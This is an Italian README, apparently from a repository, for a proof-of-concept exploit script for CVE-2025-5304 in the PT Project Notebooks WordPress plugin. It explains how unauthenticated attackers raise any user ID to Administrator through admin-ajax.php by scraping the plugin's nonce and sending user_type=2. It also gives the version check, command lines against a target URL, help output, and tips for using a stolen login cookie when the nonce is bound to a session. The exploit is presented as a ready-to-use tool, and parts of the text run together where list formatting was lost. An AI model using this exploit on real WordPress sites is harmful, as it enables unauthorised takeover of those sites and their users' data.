
PT Project Notebooks 1.0.0 - 1.1.3 - Autorizzazione mancante per escalation dei privilegi non autenticata
PT Project Notebooks 1.0.0 - 1.1.3 - Autorizzazione mancante per l'escalation di privilegi non autenticata
PoC e helper per l'exploit per PT Project Notebooks versioni 1.0.0–1.1.3: la mancata autorizzazione in
wpnb_pto_new_users_add()consente ad attaccanti non autenticati di elevare i privilegi di un utente scelto ad Amministratore tramiteadmin-ajax.php.
Il plugin PT Project Notebooks per WordPress è vulnerabile all'escalation di privilegi a causa della mancata autorizzazione nella funzione wpnb_pto_new_users_add() nelle versioni dalla 1.0.0 alla 1.1.3. Ciò consente ad attaccanti non autenticati di elevare i privilegi a quelli di un Amministratore per un ID utente specificato.
wp-content/plugins/project-notebooks/readme.txt ed estrae il tag Stable per confermare che il target sia ≤ 1.1.3.custom.nonce e custom.ajax_url iniettati dal plugin nella pagina (tramite wp_localize_script).admin-ajax.php con action=wpnb_pto_new_users_add, il nonce scoperto, ids=<UserID> e user_type=2 per copiare tutte le capacità di Amministratore sull'utente target.wordpress_logged_in_* corrispondente affinché wp_verify_nonce() abbia successo.python3 CVE-2025-5304.py -u "http://TARGET/wordpress" -id 28
python3 CVE-2025-5304.py -u "http://TARGET/wordpress" -id 28 -c "wordpress_logged_in_...=..."
CVE-2025-5304.py -help
usage: t.py [-h] -u URL -id ID [-c COOKIE] [--skip-version]
CVE-2025-5304 (Nxploited Edition)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g. http://127.0.0.1/wordpress)
-id, --id ID User ID to escalate (e.g. 28)
-c, --cookie COOKIE Optional Cookie header value for session-bound nonces
--skip-version Skip readme.txt version check
-u / --url — URL di base del sito; lo strumento lo normalizza e legge il readme del plugin + la home page.-id / --id — ID utente numerico WordPress da elevare (è sufficiente un Subscriber).-c / --cookie — Valore completo dell'header Cookie (es. wordpress_logged_in_*=...) richiesto se il nonce è legato alla sessione.--skip-version — Salta il controllo del tag Stable in readme.txt (utile quando il readme è nascosto o personalizzato).Note su nonce e cookie
custom.nonce è visibile in una finestra privata/incognito, è pubblico: nessun cookie necessario.wordpress_logged_in_* con -c.custom.ajax_url (schema/host/porta/percorso) mostrato nel sorgente della pagina.Questo repository, il PoC e il codice sono forniti solo per scopi educativi e test di sicurezza autorizzati. Sei l'unico responsabile di assicurarti di avere il permesso esplicito di testare i target. L'autore non si assume alcuna responsabilità per usi impropri o danni derivanti dall'uso di questo progetto.
Di: Khaled Alenazi (Nxploited)